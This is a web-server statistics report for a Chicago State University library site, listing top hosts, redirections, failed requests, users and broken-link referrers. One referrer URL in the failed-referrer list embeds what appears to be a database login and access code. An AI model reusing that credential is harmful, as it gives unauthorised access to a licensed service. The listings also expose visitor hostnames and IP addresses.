1471 0.04%by1sch4041909.phx.gbl
1468 0.02%host-10-141-1-104.csu.edu
1466 0.08%fm-ip-61.247.21.4.fast.net.id
1466 0.08%external47-158.cps.k12.il.us
1462 0.02%213.186.122.3.utel.net.ua
1448 0.04%crawl-66-249-71-116.googlebot.com
1445 0.04%host-10-141-2-14.csu.edu
1423 0.08%smtp-tw.ssfhs.org
1421 0.04%crawl-66-249-72-136.googlebot.com
1416 0.13%unknown-74-6-19-x.yahoo.com
1411 0.03%host-10-141-2-37.csu.edu
1409 lovejoy.w3.org
1408 0.03%workstation-172-16-33-23.csu.edu
1405 0.07%workstation-10-141-1-57.csu.edu
1400 0.04%workstation-172-16-17-26.csu.edu
1398 0.02%host-10-141-1-21.csu.edu
1396 0.03%crawl-66-249-71-14.googlebot.com
1389 0.03%host-10-141-1-12.csu.edu
1388 0.02%workstation-172-16-33-69.csu.edu
1388 0.03%workstation-172-16-33-71.csu.edu
1387 0.02%host-10-141-1-243.csu.edu
1383 0.07%external47-154.cps.k12.il.us
1383 0.02%38.111.147.84
1379 0.11%usloft1708.serverloft.com
1375 0.06%llf320027.crawl.yahoo.net
1368 0.03%host-10-141-2-67.csu.edu
1359 0.03%host-10-141-1-143.csu.edu
1357 0.04%web-crawler.irl.cs.tamu.edu
1357 0.03%host-10-141-1-217.csu.edu
1350 0.04%host-10-141-1-227.csu.edu
1350 0.10%workstation-10.141.1.97.csu.edu
1335 0.03%workstation-172-16-33-58.csu.edu
1327 0.05%host-10-141-2-73.csu.edu
1325 0.07%workstation-10-141-1-2.csu.edu
1321 0.02%workstation-172-16-33-31.csu.edu
1319 0.07%workstation-10-141-1-172.csu.edu
1318 0.02%workstation-172-16-33-63.csu.edu
1314 0.08%62.38.54.81
1310 0.08%workstation-10.141.1.66.csu.edu
1309 0.06%host-10-141-1-116.csu.edu
1306 0.02%host-10-141-1-66.csu.edu
1300 0.05%host-10-141-1-132.csu.edu
1300 0.02%workstation-172-16-34-76.csu.edu
1295 0.02%crawl-66-249-72-232.googlebot.com
1290 0.02%host-10-141-1-31.csu.edu
1287 0.41%75-93-234-108.nyc.clearwire-wmx.net
1286 0.02%host-10-141-2-54.csu.edu
1285 0.04%workstation-172-16-33-57.csu.edu
1283 0.02%host-10-141-1-236.csu.edu
1283 0.02%host-10-141-1-32.csu.edu
1270 0.02%workstation-172-16-33-72.csu.edu
1265 0.04%host-10-141-1-44.csu.edu
1262 0.03%workstation-172-16-33-27.csu.edu
1262 0.02%crawl-66-249-72-74.googlebot.com
1260 0.04%host-10-141-1-40.csu.edu
1260 0.04%89-165-214-151.next-gen.ro
1254 0.04%spider40.yandex.ru
1253 0.01%crawl-66-249-71-247.googlebot.com
1245 0.02%host-10-141-1-78.csu.edu
1245 0.05%unknown-74-6-17-x.yahoo.com
1243 0.03%host-10-141-1-248.csu.edu
1241 0.03%workstation-172-16-33-52.csu.edu
1237 0.04%host-10-141-1-145.csu.edu
1235 0.03%workstation-10-141-1-58.csu.edu
1232 0.05%host-10-141-1-115.csu.edu
1229 0.06%workstation-172-16-17-34.csu.edu
1226 0.04%host-10-141-1-179.csu.edu
1225 0.04%host-10-141-1-11.csu.edu
1225 0.05%c-71-228-59-164.hsd1.il.comcast.net
1224 0.07%llf520130.crawl.yahoo.net
1224 0.04%workstation-172-16-17-36.csu.edu
1220 0.03%b3090925.crawl.yahoo.net
1220 0.05%workstation-10-141-1-65.csu.edu
1216 0.02%host-10-141-2-103.csu.edu
1207 0.02%sticker00.yandex.ru
1187 0.02%host-10-141-1-181.csu.edu
1185 0.03%69.25.71.12
1178 0.32%72.14.194.18
1177 static.78-46-84-179.clients.your-server.de
1174 0.05%workstation-10-141-1-39.csu.edu
1171 0.02%workstation-172.16.34.82.csu.edu
1169 0.03%host-10-141-1-223.csu.edu
1167 0.02%host-10-141-1-139.csu.edu
1166 0.05%workstation-10-141-1-25.csu.edu
1158 0.03%host-10-141-1-124.csu.edu
1156 0.31%208.68.136.250
1154 0.09%unknown-74-6-86-x.yahoo.com
1149 0.02%host-10-141-1-57.csu.edu
1148 0.06%unknown-72-30-216-x.yahoo.com
1147 0.06%workstation-10-141-1-69.csu.edu
1145 sd-30197.dedibox.fr
1143 0.02%workstation-172-16-17-48.csu.edu
1141 0.06%workstation-10-141-1-191.csu.edu
1133 0.03%c-68-80-208-178.hsd1.nj.comcast.net
1132 0.06%workstation-10-141-1-109.csu.edu
1129 0.02%host-10-141-2-13.csu.edu
1121 0.04%host-10-141-1-39.csu.edu
1117 0.41%c-67-167-204-93.hsd1.il.comcast.net
1113 0.06%workstation-10.141.1.126.csu.edu
1104 0.05%host-10-141-1-129.csu.edu
1103 0.05%workstation-10-141-1-62.csu.edu
1103 0.08%msnbot-65-55-209-157.search.msn.com
1102 0.02%workstation-172-16-33-73.csu.edu
1100 0.05%c-71-194-197-54.hsd1.il.comcast.net
1098 0.07%workstation-10.141.2.0.csu.edu
1096 0.05%crawl-66-249-66-234.googlebot.com
1094 0.02%crawl-66-249-72-43.googlebot.com
1091 0.06%workstation-10-141-1-56.csu.edu
1090 0.05%workstation-172.16.33.82.csu.edu
1080 0.02%crawl-66-249-72-101.googlebot.com
1074 0.05%workstation-172.16.33.80.csu.edu
1052 0.06%hk2-lr680135g.super-goo.com
1052 0.05%city-of-chicago-filter2.illinois.net
1051 0.03%host-10-141-1-172.csu.edu
1050 0.05%ec2-67-202-7-225.compute-1.amazonaws.com
1050 0.03%host-10-141-1-192.csu.edu
1045 0.02%ptp.010.kcl.net
1045 0.02%host-10-141-1-171.csu.edu
1040 0.04%workstation-10-141-1-169.csu.edu
1037 0.03%workstation-172-16-17-35.csu.edu
1036 0.04%5299.org
1034 0.01%host-10-141-2-121.csu.edu
1029 0.02%crawl-66-249-72-72.googlebot.com
1024 0.02%host-10-141-1-17.csu.edu
1021 0.03%host-10-141-2-40.csu.edu
1019 0.02%host-10-141-2-50.csu.edu
1017 0.02%host-10-141-1-75.csu.edu
1012 0.02%host-10-141-2-7.csu.edu
1011 0.01%crawl-66-249-71-206.googlebot.com
1009 0.01%host-10-141-2-60.csu.edu
1006 0.02%220.181.94.223
1001 0.03%host-10-141-1-52.csu.edu
157860867.83%[not listed: 135,394 hosts]

Host Redirection Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the computers which were redirected to another file.

Listing hosts with at least 250 redirected requests, sorted by the number of redirected requests.

reqshost
1642msnbot.msn.com
381mail.fru-it.ru
314202.179.180.45
305c-68-80-208-178.hsd1.nj.comcast.net
301c-71-57-17-155.hsd1.il.comcast.net
291208.111.154.15
270208.111.154.16
269crawl-66-249-70-239.googlebot.com
266b3091219.crawl.yahoo.net
2645.ovz.chicago.123systems.net
39314[not listed: 7,269 hosts]

Host Failure Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the computers which encountered failed requests.

Listing hosts with at least 250 failed requests, sorted by the number of failed requests.

reqshost
1170172.32.159.172
739963.81.0.20
6134b3091219.crawl.yahoo.net
4755msnbot.msn.com
358872.32.159.173
3189crawler-gw-01.bos3.fastsearch.net
2524workstation-172-16-33-35.csu.edu
1864workstation-172.16.33.82.csu.edu
1781c-67-184-125-51.hsd1.il.comcast.net
171474-61-172-171.chi.clearwire-wmx.net
1690spider16.yandex.ru
1577workstation-172.16.33.80.csu.edu
1480external47-158.cps.k12.il.us
1419external47-162.cps.k12.il.us
139170.42.51.20
1382workstation-172.16.33.88.csu.edu
1341workstation-172.16.33.84.csu.edu
1270workstation-172-16-33-55.csu.edu
1245workstation-172.16.33.90.csu.edu
1160c-67-176-167-176.hsd1.il.comcast.net
1112crawl7.dotnetdotcom.org
1105workstation-172.16.33.95.csu.edu
108967.110.143.50.ptr.us.xo.net
1088workstation-172.16.33.97.csu.edu
1058workstation-172-16-17-34.csu.edu
973workstation-172-16-33-46.csu.edu
947workstation-172.16.33.98.csu.edu
945user-37ka4a0.dsl.mindspring.com
945workstation-172.16.34.92.csu.edu
895guardian2.ccc.edu
868workstation-172-16-33-76.csu.edu
786c-68-32-126-140.hsd1.va.comcast.net
774pool-71-189-235-170.lsanca.dsl-w.verizon.net
744b3090900.crawl.yahoo.net
726workstation-172-16-33-53.csu.edu
711crawl-66-249-71-200.googlebot.com
710workstation-172.16.33.83.csu.edu
709workstation-172-16-33-64.csu.edu
707workstation-172.16.33.86.csu.edu
67938.101.148.126
666209-254-104-210.dsl.mcleodusa.net
656egspd42413.ask.com
653msnbot-65-55-213-3.search.msn.com
635b3091290.crawl.yahoo.net
626workstation-172-16-17-35.csu.edu
623workstation-172-16-33-49.csu.edu
618workstation-172-16-33-61.csu.edu
617www.style-7.com
616workstation-172-16-33-41.csu.edu
614workstation-172.16.16.84.csu.edu
613workstation-172-16-33-54.csu.edu
577workstation-172-16-33-109.csu.edu
571workstation-172-16-33-103.csu.edu
567usloft1708.serverloft.com
566workstation-172-16-33-43.csu.edu
55512.108.127.159
549workstation-172.16.33.85.csu.edu
544external47-150.cps.k12.il.us
542workstation-172-16-17-43.csu.edu
542dhs-outbound.bos3.fastsearch.net
536u15191848.onlinehome-server.com
527fw1.nmh.org
526workstation-172-16-33-39.csu.edu
509springy02.springshare.com
504workstation-172-16-33-45.csu.edu
50166.231.189.102
498workstation-172-16-17-26.csu.edu
489msnbot-65-55-213-5.search.msn.com
485workstation-172-16-33-104.csu.edu
484workstation-172-16-17-57.csu.edu
483b3091150.crawl.yahoo.net
482workstation-172-16-33-100.csu.edu
474220.181.19.170
470vhost09.ev1servers.net
466atlanta.transcore.com
465210.108.47.5
465206-225-85-167.dedicated.abac.net
464msnbot-65-55-213-4.search.msn.com
45999-146-67-59.lightspeed.chcgil.sbcglobal.net
455workstation-172.16.15.80.csu.edu
454workstation-172.16.18.35.csu.edu
45238.111.147.84
451workstation-172.16.33.87.csu.edu
445workstation-172.16.15.86.csu.edu
439workstation-172.16.33.94.csu.edu
438workstation-172-16-33-68.csu.edu
434external47-154.cps.k12.il.us
431city-of-chicago-filter2.illinois.net
429cache-dtc-ae05.proxy.aol.com
420spider82.yandex.ru
419208.66.195.9
419workstation-172-16-17-36.csu.edu
408216-80-117-147.c3-0.lem-ubr1.chi-lem.il.cable.rcn.com
408125.71.79.82.static.cluj.rdsnet.ro
406crawl-66-249-71-154.googlebot.com
405workstation-172.16.33.89.csu.edu
400workstation-172-16-33-44.csu.edu
393workstation-172-16-33-105.csu.edu
392ppp-68-251-49-94.dsl.chcgil.ameritech.net
388cache-dtc-ae01.proxy.aol.com
388cache-rtc-ad08.proxy.aol.com
387workstation-172-16-33-101.csu.edu
384windows.future-host.org
383workstation-172-16-33-78.csu.edu
381208.66.195.2
381workstation-172-16-33-27.csu.edu
380adsl-75-57-185-216.dsl.emhril.sbcglobal.net
379cache-dtc-ab06.proxy.aol.com
376workstation-172-16-17-45.csu.edu
375workstation-172-16-33-37.csu.edu
370cache-rtc-ad05.proxy.aol.com
368ds00220.lunarpages.com
364crawl-66-249-70-239.googlebot.com
363workstation-172-16-17-38.csu.edu
359external47-160.cps.k12.il.us
35867.151.219.61
353cache-mtc-ad08.proxy.aol.com
352cache-rtc-ab07.proxy.aol.com
348workstation-10-141-1-45.csu.edu
341workstation-172-16-33-62.csu.edu
340cache-dtc-ab10.proxy.aol.com
333rate-limited-proxy-72-14-199-119.google.com
331jyxo-crawler3.streaming.cesnet.cz
32982.5b.344a.static.theplanet.com
325workstation-172-16-17-53.csu.edu
322workstation-172-16-33-40.csu.edu
319cache-mtc-ad05.proxy.aol.com
31891.201.66.28
317c-67-175-179-18.hsd1.il.comcast.net
315cache-rtc-ab04.proxy.aol.com
315d53-64-121-136.nap.wideopenwest.com
315paginasamarillas.es
31362.38.54.81
313crawl-66-249-72-136.googlebot.com
309sd-13833.dedibox.fr
309egspd42204.ask.com
309198.173.15.250
305c-71-57-17-155.hsd1.il.comcast.net
304pool-70-17-200-157.balt.east.verizon.net
304spider40.yandex.ru
303sip.portuvox.com
302workstation-172.16.9.81.csu.edu
301workstation-172-16-33-26.csu.edu
299208.66.195.10
296cache-mtc-ab07.proxy.aol.com
295ptp.010.kcl.net
293sd-17627.dedibox.fr
293static-88.131.106.22.addr.tdc.se
292cache-mtc-ab04.proxy.aol.com
289workstation-172-16-33-60.csu.edu
287ia360938.us.archive.org
286workstation-172-16-33-48.csu.edu
285workstation-172-16-33-24.csu.edu
284c-67-175-226-105.hsd1.il.comcast.net
284workstation-172-16-33-56.csu.edu
282d53-40-253.nap.wideopenwest.com
281workstation-172-16-33-51.csu.edu
280fa.5.85ae.static.theplanet.com
279workstation-172-16-17-50.csu.edu
27866.99.6.2
277workstation-172.16.15.84.csu.edu
271208.66.195.8
270sr341.2dayhost.com
270llf320049.crawl.yahoo.net
269workstation-172.16.15.81.csu.edu
263external47-152.cps.k12.il.us
262208.66.195.7
262fm-ip-61.247.21.4.fast.net.id
261epsilon.shost.pl
261190.42.82.130
260crawl-66-249-71-2.googlebot.com
259workstation-172.16.33.93.csu.edu
256236.24.149.190.dsl.intelnet.net.gt
250workstation-172-16-17-24.csu.edu
250adsl-68-72-80-4.dsl.chcgil.ameritech.net
213191[not listed: 21,957 hosts]

User Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the users who requested files, if users have been authenticated or can be identified by cookies.

Listing users with at least 250 requests, sorted by the number of requests.

reqs%bytesuser
369100%[not listed: 8 users]

User Redirection Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the users who were redirected to another file.

Listing users with at least 250 redirected requests, sorted by the number of redirected requests.

reqsuser
53[not listed: 5 users]

User Failure Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the users who encountered failed requests.

Listing users with at least 250 failed requests, sorted by the number of failed requests.

reqsuser
503""
68[not listed: 8 users]

Redirected Referrer Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the referrers that caused redirected requests.

Listing referring URLs with at least 250 redirected requests, sorted by the number of redirected requests.

reqsURL
5210http://libnext.csu.edu/
468http://www.csu.edu/facultyinformation/index.htm
332http://libnext.csu.edu/find/
2619[not listed: 783 URLs]

Failed Referrer Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the referrers containing broken links to the site.

Listing referring URLs with at least 250 failed requests, sorted by the number of failed requests.

reqsURL
52631http://libnext.csu.edu/journals/index.php
21671http://libnext.csu.edu/cgi-bin/eresources/eselect.py
19647  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?title=All Databases
1484  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?types=articles&title=Article Databases
18922http://libnext.csu.edu/cgi-bin/eresources/subject.py
5602  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Education Databases&subject=education
4840  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Psychology Databases&subject=psychology
2108  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Health Sciences Databases&subject=healthsciences
1553  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Criminal Justice Databases&subject=criminaljustice
1258  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Business Databases&subject=business
793  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Physical Education Databases&subject=PhysicalEducation&altsubject=PhysicalEducation
725  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=News and Current Events Databases&subject=news
705  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=History Databases&subject=history
513  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Literature Databases&subject=literature
423  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Databases for Children&subject=childeducation
386  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Music Databases&subject=music
10  http://libnext.csu.edu/cgi-bin/eresources/subject.py?title=Pharmacy Databases&subject=pharmacy
7764http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py
1176  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=aph&dbname=Academic Search Premier
443  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=eric&dbname=ERIC (EBSCO)
428  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/&dbname=EBSCO databases
416  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&dbname=ProQuest databases
218  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=ProQuest Education Journals
205  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=Education Journals (ProQuest)
203  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&dbname=EBSCO AtoZ
192  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=pdh&dbname=PsycARTICLES
168  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=newfirstsearch.oclc.org/FSIP
168  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP&dbname=ABI Inform
140  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=Lexis-Nexis Academic Universe - Legal Research
116  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WilsonSelectPlus;FSIP&dbname=Wilson Select Plus
110  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=Newsbank
107  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=psyh&dbname=PsycINFO
92  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=rzh&dbname=CINAHL Plus with Full Text
87  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ERIC;FSIP&dbname=ERIC (FirstSearch)
82  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998&dbname=Criminal Justice Periodicals
80  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com/iw-search/we/Homepage?p_action=doc&p_theme=current&p_nbid=X6CQ5BGSMTEyNDk5NjgyMy40NDUzOTk6MToxMjo2Ni4xNTguMjguNDI&dbname=Newsbank
80  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/stories/mainmenu.asp&dbname=FACTS.com
80  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=ERIC (FirstSearch)
76  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.search.eb.com/&dbname=Encyclopedia Britannica
74  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=sb2.abc-clio.com:81/&dbname=America: History and Life
70  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=FirstSearch databases
67  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP&dbname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP
60  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=ilcso.illinois.edu/&dbname=Social Work Abstracts
60  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&dbname=ArticleFirst
60  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=aabd.chadwyck.com/&dbname=African American Biographical Database
58  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998
58  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&dbname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998
58  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h&databasename=Academic Search Complete
56  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=ABI Inform
53  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.csa2.com/htbin/dbrng.cgi?username=cstateu9&access=cstateu9009&cat=pei&adv=1&dbname=Physical Education Index
52  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WorldCat;FSIP&dbname=WorldCat
52  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/&dbname=search.epnet.com/
52  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=nfh&dbname=Newspaper Source
50  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=ArticleFirst
48  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com/iw-search/we/Homepage?p_action=doc&p_theme=current&p_nbid=X6CQ5BGSMTEyNDk5NjgyMy40NDUzOTk6MToxMjo2Ni4xNTguMjguNDI&dbname=infoweb.newsbank.com/iw-search/we/Homepage?p_action=doc&p_theme=current&p_nbid=X6CQ5BGSMTEyNDk5NjgyMy40NDUzOTk6MToxMjo2Ni4xNTguMjguNDI
46  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com/&dbname=Newsbank
42  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com/iw-search/we/Homepage?p_action=doc&p_theme=current&p_nbid=X6CQ5BGSMTEyNDk5NjgyMy40NDUzOTk6MToxMjo2Ni4xNTguMjguNDI&dbname=Chicago Sun Times
42  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=gateway.ut.ovid.com/gw1/ovidweb.cgi?New+Database=Single|0&S=IDNJHKIDKGPBFN00&dbname=ERIC (OVID)
42  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=llh&dbname=Library Literature & Information Science
40  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=buh&dbname=Business Source Premier
36  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=Wilson Select Plus
33  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=Lexis-Nexis Academic Universe - News
32  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=cin20&dbname=CINAHL
32  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=web.lexis-nexis.com/universe
32  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&dbname=atoz.ebsco.com/home.asp?ID=cgcsu
32  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=srck5&dbname=Kids Search
32  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=ilcso.illinois.edu/&dbname=OVID databases
32  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com/iw-search/we/Homepage?p_action=doc&p_theme=current&p_nbid=X6CQ5BGSMTEyNDk5NjgyMy40NDUzOTk6MToxMjo2Ni4xNTguMjguNDI&dbname=Chicago Tribune
31  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=BooksInPrint;FSIP&dbname=Books in Print
30  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=infoweb.newsbank.com
30  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/icof/issues-home-feature.asp&dbname=Issues and Controversies
29  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h&databasename=Academic Search Complete&&dbname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h
28  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web10.epnet.com/selectDbsPost.asp?tb=1&_ug=sid+87D492A9-9DB1-41FF-89EF-FA8C141B1635@sessionmgr3+cp+1+4FA2&_us=dstb+DB+sm+DB+1D03&_uso=hd+False+C560&db=rzh&dbname=CINAHL Plus with Full Text
28  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&dbname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP
26  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=abstractsdb.ncjrs.org/content/AbstractsDB_Search.asp&dbname=National Criminal Justice Reference Service
26  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=Chicago Tribune
